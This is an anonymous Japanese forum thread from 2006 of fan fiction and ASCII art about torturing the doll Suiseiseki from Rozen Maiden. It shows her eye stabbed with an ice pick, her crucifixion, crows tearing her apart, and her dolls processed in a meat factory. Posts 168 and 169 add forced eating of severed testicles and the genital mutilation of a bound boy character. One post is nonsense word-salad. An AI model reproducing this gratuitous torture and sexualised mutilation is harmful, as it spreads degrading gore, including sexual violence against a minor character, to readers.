『ガフっっ!ゲハっ!ウグヒホッ!ガホッ!ゲヒッッっ!ゲハっ!ウグヒホッ!グハァッ!ゴフホォtッツ!ウグヒホッ!グハァッ!
ウグヒホッ!グハァッ!ゴフホォtッツ!ゲハっ!ウグヒホッ!グっゲハっ!ウギ゛ヒホッ!クグガガフっっ!ゲハっ!ウグヒホッ!
ゲハっ!ウグヒホッ!グハァッ!ゴゲヒッッっ!グホッツ!ゲハっ!ウグヒホッ!ウグヒホッ!グハァッ!ゲェェェェグッツハッツ!』

「こぉんな人形ぅッ! 壊してやるゥッ!」

ジュンが、トドメをさそうと、半壊した翠星石の鞄を振りかざし、
メッタ討ちにしようとしたそのとき、真紅の冷やかな声が響く。「やめなさい、ジュン。」
ジュンは呆気にとられて鞄を持つ手を離した。
「あなたの気持ちはよく判ったわ。無理もないでしょうね。そして雛苺も。
ただ、ここは私に任せて頂戴。薔薇乙女には、薔薇乙女なりのケジメのつけ方がある。」
「翠星石! 悪いけど、貴方に同情の余地はないわ。貴方は明らかに薔薇乙女の誇りを穢し、
そして人間とドールの絆をズタズタにしたのだわ。私たちはローゼンメイデン。
人により造られしもの。人を悦楽させるべき存在であるはずのドールが
随分と出過ぎた真似をしたものだわ。あなたはジュンの意識野を陶冶し潤沢させるべき
『夢の庭師』のはず。しかしあなたはジュンを補助するどころか寧ろその邪魔になる
存在に成り果てたのだわ。わかるわね?翠星石.......」
そんな、そんなつもりではないのですぅ!わかってくださいですぅ!
翠星石はジュンや雛を..翠星石なりに想っていたのですぅ!
内気なジュンを元気づけてやりたかったですぅ!  
そんなことでも云おうとしていたのだろう。しかし粘る口腔がその発言を許さなかった。
『ゾンナァ、ゾォンナァヅゥヴォォリダァダイベズゥ!バガッデグダダイベズゥ!グベッ!』
ヘド声で必死に弁明する翠星石。しかしその姿が一層、ジュンの憎悪を掻き立て、
彼の心の中にどす黒くねっとりとした闇の領域を拡大させたのだった。

158 :名無しさん?:2006/07/21(金) 01:26:05
「うるさいんだよ!ヘドロ以下のクソミドリ!もう我慢の限界だ!こうしてやる!」
そう叫ぶとジュンはどこから調達したのか、太針のアイスピックをやにわに取り出し、
翠星石のチャームポイントのひとつ、そのオッドアイの紅い右眼に振りかざそうとした!
「やめなさい、ジュン。気持ちはよく、判るわ。でも、眼はドールの命よ。
人形師は、最後に、魂を込める仕上げとして、ドールに眼球を嵌めるの。判って頂戴。」
はじめて真紅が自分に味方してくれた、そんな一時の喜びから、
虐待三昧の翠星石の罅割れた顔面にほのかな笑みが増した。
しかし、刹那的にあの毒舌が蘇ったのが、そんな真紅の精一杯の心配りを無にすることになる。
『じんぐはやっばでぃ、ずいぜいぜぎぃのびがだべずぅ!
ばがっだべずが、ごのじびびんげん!ぼばえなんが、ぜっだびぶるざないべずぅ!』
久しぶりに蘇った『チビ人間』の語が、ジュンの逆鱗に触れ、彼の憎悪を外向的に
爆発させたのは云うまでもない。腰のコルセットを渾身の一撃で蹴り上げる!
「また言ったな!僕はチビじゃない!桜田ジュン、名前があるんだ!
いつもそうして、おまえこそ僕を何度馬鹿にして、貶めて、さぞ気分いいだろうなあ!
雛や僕を踏み台にした、テメエの優越感、そんなに心地いいかよ!
もう限界だ!おまえなんか、お前なんか、オマエなんか!!!こうしてやる!!!!!!!!!!!!!!!!!!」
真紅の制止すら振り切り、ジュンは凄まじい、鬼神の如き形相で、
アイスピックをぐさりと深く、翠星石の右の紅眼に突き立てた!
『ヒイィグググゥゥゥゥゥィ!グヘハッッッ!!!』翠の口から、舌たらずながらも凄まじい阿鼻叫喚が漏れた!
「わかったわ・・・ジュン。右眼のみ、あなたに虐待を許可するわ。」
たまりかねた真紅。ジュンはしてやったり、という表情で、狂ったように何度も何度も
右眼にアイスピックを突き立てるのだった。
グサッ! グサッ! グサッ! グサッ! グサッ! グサッ! グサッ! グサッ! グサッ! グサッ! グサッ! グサッ!

159 :名無しさん?:2006/07/21(金) 01:26:51
数十分が経過した。既に右の眼窩はポッカリと深い孔と化し、紅い硝子の眼球の破片が
カラカラと、人形の空洞の頭蓋の中で音を立てるのが聞き取れる。
「このクソジャンク!ミドリのドレスの襤褸雑巾!おまえなんか!おまえなんか!」
憎悪に震えるジュンの渾身の一撃。アイスピックの柄がすっかり眼窩の孔に埋もれるほどに
ずぶりと深く、突き刺してトドメをさす。しかし、人形に死は与えられない。
不幸にも、ローザミスティカを失わぬ限りは、如何なる物理的欠損を受けても、
彼女らは人と同じように喋り、笑い、泣き、意思表示をする。度重なる、凄惨な虐待も
決して翠星石に死という名の安息を与えることは叶わない。
「もう、いいわね?ジュン。充分、気は済んだかしら...」
怒りに肩を震わせるジュンの手を、柄から離させると、真紅はいよいよ、その内に秘めた
更なる残酷な、『ドールへの処刑宣告』を宣告すべく、
右目にアイスピックを突き立てたままの翠星石をまじまじと見つめる。
「ジュン、マンホールの蓋を外して頂戴。早く」おさげ髪を固定して拘束している
重い蓋をジュンが外すと、真紅は無造作に二股おさげをわしづかみにして、冷酷に
翠星石を引きずり起こした。「さあ、いらっしゃい。翠星石。『処刑場』に連行するわ」
そういうと、路上から再び玄関をまたぎ、桜田家のいつもの「n のフィールド鏡」へと
やってきた。既に両足を破壊され、右眼に異物を突き刺されたままの、歩行ままならぬ翠をひきずりながら、
真紅はホーリエを召還し、何やらまじないの句を詠み、フィールドの扉を開いた。
「ジュン、あなたもいらっしゃい。見届けるといいわ。」
そうして3者はフィールド内に入った。
中の世界は、今までに見た真紅や雛苺、そして水銀燈のそれとは全く異なる
褐色の空に覆われ、地面に恐竜の骨が転がる荒涼とした光景が広がっていた。
あいかわらず真紅は翠のおさげをしっかり握り、引きずりながら移動していた。
夥しい骨の破片の絨毯の上を引きずり廻され、自慢のスカートパニエもすっかりズタズタボロボロだ。

160 :名無しさん?:2006/07/21(金) 01:28:20
「ここはドールの処刑場。そうね、人間から見れば、処分場、といったほうが正しいかしら」
真紅は淡々と話しながら、こっちよ、と何やら怪しげな「もの」が多数屹立する場所を
指差した。まるでゴルゴダのように十字架が林立する丘。
その中の一際背の高い十字架の前で、真紅は立ち止まり、翠のおさげを手放した。
「ジュン、手伝って。」真紅はまず十字架を一旦引き抜き、地面に寝かせるよう指示した。
「おっ?意外に簡単に引き抜けるじゃないか。それからどうすんだ?」
真紅はその十字架の上に満身創痍の翠星石を寝かせて、両手を拡げさせる。
両足は既に破砕されて失われているので、両手と頸部を十字架に固定させるように指示する。
「そうね。この子のおさげを使うと良いわね。」そういうと、真紅はおさげ髪を巧く使って
翠星石の左手首を架上に括りつけた。「ジュン、右手を御願い。きつく縛るのよ」
最後にリボンで頸を括りつけた。「無駄に長いクソ髪だったが、こういうときには役に立つな!
皮肉なもんだよなあ、このジャンクミドリ!」そういうと、ジュンはまたコルセットを
力いっぱい蹴り上げ、また右眼に刺さったままの柄をぐりぐりと抉り回した。
「ジュン、遊んでいる暇はないわ。処刑の準備・最後の儀式よ。
コレをあの子の全身に、くまなく、塗りなさい。顔面にも、左目にも。
しっかり、剥けたりしないように。」そういうと、無臭の不思議な軟膏のようなものを
ジュンに手渡した。淡々と、軟膏を翠星石の衣裳・カラダのパーツ・顔面・そして
残った左の眼球にも塗っていく。幾重にも。幾重にも。
「お疲れ。ジュン。いいわ。十字架を元の場所に立てて頂戴。いい具合ね。」
ジュンは元通りに立て直すと、まじまじと架上の翠星石を眺め、最後の罵声を放った。
「へっ!いい気味だぜ!この性悪毒舌クソミドリ!誇り高き真紅様が
おまえの処刑を直々に取り仕切ってくれてるんだからな!」そういう矢先、
真紅が反対の方向を指差した。「うふふ。来たわね。」
果たしてその方向には、夥しい数の鴉の群れが近づきつつあった。

161 :名無しさん?:2006/07/21(金) 01:29:26
「さあ、ジュン。私たちはここを離れるわよ。」後は彼ら(そういって真紅は鴉を指差した
に任せましょう、そういって真紅はジュンの手を引き、十字架の元を立ち去っていった。
程なく、架上の翠星石は、何十匹もの鴉に拠ってたかられ、一瞬のうちに黒山の鴉だかりの塊と化した。
『びぶぶぶぅ!ぐびぶぶぅ!げぶぅごぶびおごぶぶぅぅぅぅぅぅ!』
嘴による容赦ない攻撃を全身に浴び、翠星石の陶器のビスク素体は粉々になろうとしている。
軟膏〜鴉のフェロモン剤〜を満遍なく塗られた顔面も例外ではない。
『ふぶほぶぶぶぅぅぅぅぅ!ごぶぶぶぅ!ぐばぶぼぶぅぅ!ぶがふぶぅぅぅぅぅぅ!』
既に顎の周り、鼻立ち、額、無数の嘴による穴ぼこで一杯、ゆっくりと罅が入り、
少しづつ、翠星石の顔は破砕していき、粉々に崩れ落ちていった。
「カァアァーーーーーーーーーーーーーーーッ!」一際、体格の大きい一匹の鴉が雄叫びを上げると、
その嘴には碧色の左目の眼球が銜えられていた......
「これが・・・ドールの、処刑、なのか・・・?」ジュンですら、その異様な光景に呆気にとられていた。
「そう。これが、私たち薔薇乙女の誇りを穢し、ミーディアムとの絆を犯した人形に
与えられる、最も残酷な罰。ドールの最高刑。このフィールドはそのための最終処分場。
これは、あなたが望んだことよ、ジュン。でも、気に病む必要もないわ。
あの子の雛苺への仕打ちには私もうんざりしていたわ。いずれ遅かれ早かれ、
貴方に代わって私自身が同様の決断に至っていたでしょう。そう思うの。」
バサバサバサッ!鴉の群れが十字架を離れると、そこには既に翠星石たるものの
一片すらも満足に残されてはいなかった。無残にもビスクパーツは粉々に砕けて
十字架のたもとに堆く積もり、あのおさげ髪の残骸が架上に残され、
チャームポイントだったヒラヒラミドリのスカートの残滓のみが破れかぶれになって
引っかかっていた。暫くすると、ビスクパーツの残骸の山の中から、
緑色の光玉のようなものが浮遊する。ローザミスティカ。

162 :名無しちゃん…電波届いた?:2006/07/21(金) 01:30:39
「最後の仕上げよ。ジュン。あなたが取り込みなさい。もう永遠にこの子は
物理的にも精神的にも蘇ることはないわ。」そういうと真紅はジュンを促し、
ジュンはゆっくりとその胸の中に、かぼそく消え入りそうなその光を
受け入れていった。一瞬頭がクラクラしたが、次第に妙な力が漲ってきた。
「これで処刑は終わりよ。ジュン。気は済んだかしら・・・
あの子のRMは、あなたを介して私と雛苺が共有する形になるわね」
「べ、べつに僕はRMなんかちっとも欲しくない。真紅の気の済むようにしてくれ。
そもそも真紅にはRMをものにする権利があるはずだろ。そうしろよ・・・」
そういうと、ジュンは何か後味の悪さが残るような独特の気分の悪さを感じ、
それから押し黙ってしまった。二人は骨の原野を後にし、自らの世界へと戻っていった。
かくして性悪クソミドリは、永遠にこの次元の狭間に、
浮かばれることもなく、取り残され、忘れられていったのであった・・・・・・fin

163 :名無しちゃん…電波届いた?:2006/07/21(金) 11:47:21
        ___
      く/',二二ヽ>
       |l |ノノイハ))  虐待なんてできるもんなら
       |l |#゚听ノl|      してみやがれですぅ♪
      ノl⊂l_介」つ ローゼンメイデン一可愛い翠星石を
.      /ノ>、,.<ヽ\ 虐待するAAや文章をつくることなんか
.      `<_/ |. ヽ_ン'  チビ、デブ、ハゲ、バカな人間にはできっこないはずです♪
        ∪∪
        ‖‖
       ε  З ドカドカ



           ボンッ!
      Ω ;: ;  Ω
    Ω ・,' ;*;∵; ζ。;:,.
     ∵~'ハ∴∵;:;
       |l |#ξρ。;,;。∵
      '.:; *,,,,: ;・∵:;゚
      ノl⊂l_介」つ "〆
.      /ノ>、,.<ヽ\
.      `<_/ |. ヽ_ン'
        ∪∪
        ‖‖
       ε  З

164 :名無しちゃん…電波届いた?:2006/07/21(金) 11:47:59
            ┌──┐  
             i二ニニ二i
            i´ノノノヽ)))
             Wリ゚ ー゚ノリ
              ()_介」つ                                ですぅ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          |l#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ノl⊂l_介」つ
      ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ――ノ三ノ;*;∵              ≦ノ`ヽノヘ≧
                                              ミく二二二〉ミ

165 :名無しちゃん…電波届いた?:2006/07/21(金) 11:49:28
翠星石のウンチは栄養満点でチビ人間の朝ごはんにぴったりですぅ
      丶 _     .,!     ヽ    
                 >     ``‐.`ヽ、  .|、     |
                 ゙'.     ,ト `i、  `i、    .、″
                  |    .,.:/""  ゙‐,. `    /
                  `  .,-''ヽ"`    ヽ,,,、   !
                  、,、‐'゙l‐、      .丿 : ':、
                 、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''`  .,"-、
                ,r"ツぃ丶  ``````   ../  `i、
      ___       ,.イ:、ヽ/ー`-、-ヽヽヽ、−´    .l゙`-、
     く/',二二ヽ>   _,,l゙-:ヽ,;、、             、、丶  ゙i、,,、
     |l |ノノイハ))  .,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`":    │ `i、
     |l |リ゚ ー゚ノl|  ::|、、、ヽ,、、.    ```: : : ```      、.、'`  .|
    ノl_|(l_介」つ━ヽニニニニニニニニニニニニニニニニニニフ))
    ≦ノ`ヽノヘ≧
    ミく二二二〉ミ

166 :名無しちゃん…電波届いた?:2006/07/21(金) 11:50:04
  ,'~~~え             _
  {/´ ̄ヽヽ          .,',i><iヽ
 ((从_从)i@《,.        /((ノノリノ))
 ||从゚- ゚ ||/||.        ((ミi!゚ ヮ゚ノミ))
 ||⊂   ミヽ|. ぶり       /,   つ
. ≦( 、_,)_)  ぶり    (_(_, )
 て  J'J て ぶり     ● しし'
  ̄ ̄ ̄|: :     ぶり  : :  | ̄ ̄ ̄ ̄ ̄
 / ̄ ̄●.............................. ● ...... ̄ ̄ ̄\
 |:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
 |:::::::::::::::::::::::::::::::::___ブーン 〜∞::::::::::::::::::|
 |:::::::::::∞〜::::く/',二二ヽ>::: : : ::::::::::::::::::::::::|
 |::::::::::::::::::::::::::::|l |ノノイハ))::::●:::::::::::::::::::::::::|
 |::::::::::::: : : ::::::::|l |リ^〜゚ノ|んめぇーですぅ:::|
 |::::::::::::::●:::::●⊂l_介」つ●:::::::::::::::::::::::::::::|
 |::::::::::::::::::::::::::≦ノ`ヽノヘ≧::::::::::::::::::::::::::::::::|
 |:::::::●●::::::::ミく二二二〉ミ::::●:::::::::::::::::●|

167 :  ̄ ̄ ̄ ̄\/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ :2006/07/21(金) 13:21:36
     _____
   /::::::::::::::::::::::::::\                  _
  /::::::::::::::::::::::::::::::::::::::\              /  ̄   ̄ \
  |:::::::::::::::::|_|_|_|_|            /、          ヽ はぁ?黙ってろデブ
  |;;;;;;;;;;ノ   \,, ,,/ ヽ          |・ |―-、       |
  |::( 6  ー─◎─◎ )          q -´ 二 ヽ      |
  |ノ  (∵∴ ( o o)∴)          ノ_ ー  |     |
/|   <  ∵   3 ∵>          \. ̄`  |      /
::::::\  ヽ        ノ\           O===== |
:::::::::::::\_____ノ:::::::::::\        /          |


168 :名無しちゃん…電波届いた?:2006/07/21(金) 16:40:02
俺は嫌がる翠星石を無理矢理押さえつけ、異物を翠星石の口に入れようとした。

「うううっ、おえっ、もう、もうやめてです...グニュグニュしてて気持ち悪いですぅ、口から血があふれて...ドレスに黒いシミがついて...」

「ダメだ、せっかく>>167からもいだ『睾丸』なんだからよ、残さず食え」

「な、なんでそんなものを翠星石が食べなきゃだめなんですかあ!」

俺は翠星石の問いに遠い目をして答えてやった。

「この睾丸の元の持ち主>>167は『翠厨』といってな、常日頃オマエの中に自分のちんこ挿入してセーエキぶちまけたいと、そればかり願っている悲しい哀れな奴なのさ
 だから、俺が特別にそんな『翠厨』>>167の願いをかなえてやろうと、セーエキなんてみみっちいこと言わず、
 どうせなら丸ごとに、と、セーエキ製造器官たる睾丸をもいで、ダイレクトにお前の胃袋の中に入れて消化させて、文字通り1つにしてやろうと思ったわけよ」

「わ、わけわからねーですぅ!翠星石にそんな奴らの小汚ねー玉袋を食べる義務はねーですぅ!」
「いいから食え!お前が食わねーと睾丸もがれた>>167が浮かばれねーだろ!!」

俺はすっかり変色して赤黒くなった睾丸を翠星石の口に押し込んだ。

169 :名無しちゃん…電波届いた?:2006/07/21(金) 16:41:37
「おげえええええっ!気持ちわるいですぅ!腐ったイカみたいな臭いがするですぅ!
 ぐちゃぐちゃいってるのですぅ!血生臭くて、げろげろですぅ!!ああああ何かどろっとしたものがああああああ
 あ...あああ...あひ...あひひひひあ.ひひひ...睾丸...
睾丸...ジュンも睾丸持ってるのですぅ...翠星石にジュンの睾丸よこすですぅ...あふあひひぃ」

「そういうと思ったよ、ほら翠星石、お望みのモンだぜw」
そう言って俺はあらかじめロープで縛っておいたメガネの引き篭もり少年を引きずり出し、
ズボンとパンツをおろしてやった。
「や、やめろ!なにするんだ!」
「ジュン!」
「翠星石?なんでオマエがここに...うわっ!や、やめろ!なにするんだ!?」
「睾丸...ジュンの睾丸ですぅ!ジュンの睾丸は翠星石がいただくのですぅ! はくっ!はむっ、ふぅんですぅ」
「やめろぉぉぉおぉっぉぉ!!!!!!」
  ぶちっ
「ぎゃああああああああああああああああああっっ!!!??」
くちゃくちゃくちゃくちゃくちゃくちゃくちゃ
「おいしいおいしいおいしいのですぅ♪ジュンの睾丸おいしいのですぅ♪♪」

えんど

170 :名無しちゃん…電波届いた?:2006/07/21(金) 16:44:01
                                     ___
                                 /く/',二二ヽ>
                                /  |l |ノ。ノイハ))  クソミドリ畜産
  一列に並びやがれなのー             /   ノl_|(* 々゚ノ|   精肉工場
   ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄           /______________
      _                          ┠┴┬┴┬┴┬┴┬┴┬
     ,',i><iヽ                    .グヒャッ┣┬┴┬┴┬┴┬┴┬┴
    /((ノノリノ))                   グヒャッ.\┣┴┬┴┬┴┬┴┬┴┬
    ((ミi!゚ ヮ゚ノミ))                    .\ ┣┬┴┬┴┬┴┬┴┬┴
      ()夲!つ                         ┣┴┬┴┬┴┬┴┬┴┬
   ___ですぅ  ___ですぅ  ___ですぅ  ___ですぅ .__┣┬┴┬┴┬┴┬┴┬┴
.く/',二二ヽ> く/',二二ヽ> .く/',二二ヽ> く/',二二ヽ> く/',二 ┣┴┬┴┬┴┬┴┬┴┬
 |l |ノノイハ)) .|l |ノノイハ)) .|l |ノノイハ)) .|l |ノノイハ)) .|l |ノノ┣┬┴┬┴┬┴┬┴┬┴
. ノl_|リ゚ ヮ゚ノl| ノl_|リ゚ ヮ゚ノl| ノl_|リ゚ ヮ゚ノl| .ノl_|リ゚ ヮ゚ノl| ノl_|リ゚ ┣┴┬┴┬┴┬┴┬┴┬
≦c(,_uuノ≧≦c(,_uuノ≧≦c(,_uuノ≧≦c(,_uuノ≧≦c(,_u┣┴┬┴┬┴┬┴┬┴┬
=======================┣┴┬┴┬┴┬┴┬┴┬
    ((◎))       ((◎))       ((◎))      .┣┬┴┬┴┬┴┬┴┬┴
=======================┣┴┬┴┬┴┬┴┬┴┬
     ゴトゴトゴト・・・・・

171 :名無しちゃん…電波届いた?:2006/07/21(金) 16:45:33

     | | | ピュー
     ___
   く/二二,'ヽ>
    ((ハイ))|l|  
    从゚ヮ ゚.iリ|lですぅーーーー
  ≦⊂    ⊃≧
    (    )〇
    ∪"∪"


     .___ 
   く',.・二二ヽ>
  #%∴;.:;'ノイハ))∵デズブフェ!!
  ((;・;(* 々゚'#%・:
   \ ̄ ̄ ̄ ̄/
     \   /
 ̄ ̄ ̄[[|‖|]] ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    □ ガタガタガタ・・・
    □□□□
.      ∞∞∞            ___
 ̄ ̄ ̄‖  ‖ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   .| | ̄ウィィィン
     \ /               .| |
.       |.|     /        /  | |
 ビチャ  :;.;    /        ./  ..| | パクン
  ビチャ;:*;.:.__/ .______/ __[_]__
   |く/',二二ヽ>.| |く/',二二ヽ> | |く/',二二ヽ> |
   | |l |ノ。ノイハ))| | |l |ノ。ノイハ))| | |l |ノ。ノイハ))|
   | |l |(* 々゚ノl| | | |l |(* 々゚ノl| | | |l |(* 々゚ノl| |
》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》 》
 ◎   ◎   ◎   ◎   ◎   ◎   ◎
巛 巛 巛 巛 巛 巛 巛 巛 巛 巛 巛 巛 巛 巛 巛 巛

172 :名無しちゃん…電波届いた?:2006/07/21(金) 16:52:13
                      _______________
                     .|く/',二二ヽ>|く/',二二ヽ>.|く/',二二ヽ>.|
                     .||l |ノ。ノイハ))| |l |ノ。ノイハ))| |l |ノ。ノイハ))|
      / ̄ ̄ ̄ ̄┏━/ ̄ ̄ ̄||||l |(* 々゚ノl| | |l |(* 々゚ノl| | |l |(* 々゚ノl| |
     / .⊂且∩  i┸i// ,' ̄ `ヘ.|||く/',二二ヽ>|く/',二二ヽ>.|く/',二二ヽ> |
    _./_ (・x・ ) | ::|/レ θ。θ',.|||l |ノ。ノイハ))|.|l |ノ。ノイハ)).| |l |ノ。ノイハ))|
   |/,,,,,, つ⌒⊂ヽL:::」  ゝウ < .|||l |(* 々゚ノl| | |l |(* 々゚ノl| | |l |(* 々゚ノl| |
  ,/ ̄ ̄ ̄ ̄ ̄ ̄//|_/ ̄ ̄ ̄||  ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
  |~ ゜ ̄゜ ̄ ̄ ̄~~| ̄ ̄   =。||  クソミドリ畜産株式会社........................|
  |______: |,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,||,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,[|
 ._|]0::∴:::0::[二二il:]    ,-―-、 ,,||                      .[|
 |====== ;...........|  //  ̄ヽ|~~||.          /,  ̄ヽ|        {|
 ヽニ[_]ヾニニヽ''''''| ―|. (※)|':''''||.'''''''''''''''''''''''''''''''''''''|.(※)|:|'''''''''''''''''''''''''''/
     ゞゝ三ノ ̄ ̄ ̄ ゞゝ_ノ ̄ ̄ゞゝ三ノ ̄ ̄ ̄ ゞゝ_ノ ̄ ̄ ̄ ̄ ̄ ̄

173 :名無しちゃん…電波届いた?:2006/07/21(金) 17:01:12
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
| いらっしゃいかしらー  |
\             /
.   ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄
              /⌒⌒ヽ
             //ゞ\※             ________
             §!゚ ヮ゚ノ§            ‖ く/',二二ヽ> .‖
            ⊂ミ[{.∞}]ミ⊃              ‖ |l |ノ。ノイハ)).‖
 _____________________.‖ |l |(* 々゚ノ| ‖
 |く/',二二ヽ>.|く/',二二ヽ> |く/',二二ヽ> |く/',二二ヽ>‖  う      ‖
 | |l |ノ。ノイハ))| |l |ノ。ノイハ))| |l |ノ。ノイハ))| |l |ノ。ノイハ))‖   ま    ‖
 | |l |(* 々゚ノl| | |l |(* 々゚ノl| | |l |(* 々゚ノl| | |l |(* 々゚ノl|‖    い   . ‖
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄.‖     よ  .‖
 |            ○カナ精肉店            .‖_____ .‖
 |____________________.‖        ‖

174 :名無しちゃん…電波届いた?:2006/07/21(金) 17:11:19
気づいてたあの日から あなたが近づいてきた訳 歯ごたえの柔らかいこの身があなたのお好みと
飢えに耐えてる瞳にこの身はどう映る 食すならひと思いに、お肉が堅くならないように

抱きしめるあなたの腕、きつければきついほど辛いの 台所の塩こしょう、鈍く光る刃物が恨めしい

明日の夢よりこの身には油がお似合いね 気づいてたあの日から 運命を恨む訳じゃない
イヤ、やっぱりイヤ、命は尊いわ お願いです止めて中断して、動物愛の精神はないの
でも今、食べ頃です でもイヤ、痛いのはイヤ、熱いのはイヤ、でもちゃんと中まで火を通して 生だけは絶対にいや

なに言ってんだろ でもホント言やぁ、逃げたいから逃げるの って、もうキャベツ添えてるし

痛い痛い痛い、熱い熱い熱い ソースは中濃でなくちゃイヤ 食すのはイヤ
でも、美味しく食してくれなきゃもっとイヤ 食すならひと思いに お肉が堅くならないように

.    ,, ,,_    ∫ ∫ ∫ ∫     /ヽへ/l、
.   i´ヽヘヘヽノ     ___        〆     > 
.  (l |ノノ^^ノ))   .く/二二,'ヽ>     <レl从^^从`、
. £lc○ヮ○l)ヽ  ((ハイ))|l|,,,,,     <口ヮ口レu/
.   `(ll~~~lつ ┏=(。α゚#iリ|l:#;;.)=┰8⊂l^Y⊂ll
    /| ヮ|ヽ  ┃   ;  : :.  ;..  ┃   |._ハ_.|
    ~J~J~  []  从从从从从,. []   .ゝ' ゝ'

175 :カナリエ俘虜スティ ◆groMilKs4. :2006/07/21(金) 17:40:45
故・吉沢さんのお通夜が酒池肉林されたようです。
それは秩父夜祭りの室内アンテナが奉られていました。
三角関係は黄金伝説でした。
鍍金加工された後に背が高くなるをへし折られたようです。
昆布はガニメデのようにワカメかくなっていました。
ピラミッドパワーを支え張り倒すとちびくろサンボが簡単に突き出たそうです。
マゾヒストの中に出来損ないの小さな始皇帝っぽいのがいたらしいです。
あまりにも饅頭恐くてくて故・吉沢さんは大仏建立したそうです。
この土一揆に関し岩倉求みます。

176 :名無しちゃん…電波届いた?:2006/07/22(土) 01:01:31
|──┐コイツハ…___
|ニニ二i    く/',二二ヽ> >>175
|ノノヽ)))    |l |ノノイハ)) 何言ってるのか訳わかんねぇですぅーッ!!!
|-д-ノリ    |∩#゚听ノ∩
|⊂/     ノ l_|(l_介」)丿
| /        ≦ノ`ヽノヘ≧
.        ミく二二二〉ミ



ちゃんと理解してやれよw
 ┌──┐     ___ っ
 i二ニニ二i  く/',二二ヽ> っ
 i´ノノノヽ)))  |l #ノノイハ)) なっ何しやがるですぅ!
  Wリ゚ ー゚ノリ  ∬|リ`Д´ノ|
  ()_介」つ━・∬|(l_介」)l|
   〈__l__〉ジュッ≦ノ`ヽノヘ≧
   〈_ハ_〉  .ミく二二二〉ミ



生意気なんだよ!
 ┌──┐      ___
 i二ニニ二i    く/',二二ヽ>
 i´ノノノヽ)))    |l |ノノイハ)) バコ〜〜〜〜ン
 Wリ#゚听ノリノ⌒)☆))Д゚'ノl|.,∴
 と    と /彡ミ つ_介」つ
    )  /  ≦ノ`ヽノヘ≧
   ( /   ミく二二二〉ミ
  (,,ノ       (ノ(ノ

177 :名無しちゃん…電波届いた?:2006/07/22(土) 01:04:20
そいつは突然俺の家にやってきた。
翠星石とか言うわけのわからない人形が鞄に入ってやってきたのだ。
そしてこう言うのだった。
「お前は今日から私のマスターになるのですぅ。どうも頼りない馬鹿そうな人間ですが、仕方ないですぅ」
「なに?おい!俺のどこが馬鹿だと?」
初対面でそんなことを言われて黙っていられるわけがない。俺のストレスメーターは70まで上昇した。
「きゃあ!近寄るなですぅ!」
少し歩み寄ろうとしただけで翠星石は部屋から逃げていってしまった。
俺は馬鹿らしくて追いかける気も起きなかった。それよりもこの時間は俺のパソコンライフの時間だ。
人形に構っている暇なんてない。
俺はすぐさまパソコンを起動させる。
いつものようにゲームに熱中する俺。と、そこへ「人間、ドアを開けてですぅ」
おい、なんなんだ!こっちは今いいところだってのに!無視だ無視!
すると今度は行動が激しくなった。
「開けろと言ってるですぅ!開けないとドアを壊すですよ!」
ドンドンとドアを殴ったり蹴ったりする音が聞こえてくる。
「あーもう五月蝿い!開けるから待て!」
ドアを開けるなり、翠星石が部屋に飛び込んできた。そして俺の脛を思いっきり蹴るのだった。
「いってぇ!何するんだよクソ人形!殺すぞ!」
「すぐにドアを開けないからですぅ」
何なんだ!俺のゲームの時間を邪魔した上、言うこと聞いてやったらキックされるなんて。俺のストレスメーターは80に上昇した。

178 :名無しちゃん…電波届いた?:2006/07/22(土) 01:06:00
それからしばらくして翠星石は俺のことをまじまじと見つめたり、ゲームを観察したりしていた。
なんだかんだいって俺には気があるらしい。
「人間、椅子が無いから膝の上に座らせるですぅ」
「は?邪魔だっつうの。第一、ゲーム見えないじゃん。俺現在司令官やってんだから、負けるわけにはいかないんだよ」
「そんなことしったこっちゃないです」
そう言って翠星石は俺の膝の上に無理矢理よじ登ってきた。そのままプレイを続けたが、ゲームの内容は酷い有様だった。
味方の陣地に誤爆してしまったのだ。おかげで司令官解任、さらにはサーバーからバン(追い出される)されてしまった。
それもこれもこいつのせいだ!この人形、妙にいい匂いするし、感触いいし・・・!
とりあえず気分をすっきりさせるために風呂にでも入ってこよう。
俺は翠星石を抱きかかえて床に下ろした。
風呂から上がった俺は、服を着ながらいつもの楽しみである風呂上りのヨーグルトの一気飲みのことを考えていた。
暑く火照った喉に流れ込む冷たいヨーグルトのことを考えただけで、ニヤけてしまった。
そして服を着終わった俺は冷蔵庫を開ける。ついにきたぜ!ヨーグルトちゃん!
「・・・え?」
そこには信じられない光景があった。
ない!間違いなくそこに置いてあったはずのヨーグルトがなかったのだ!
「オーマイガーーーーット!!!ちょっとちょっと、嘘でしょ!嘘でしょ!?」
俺はもう泣きそうな気分だった。なんでよ?牛乳屋さんちゃんと持ってきたじゃん。マジありえねえよ!「まさか・・・あいつか!!!」
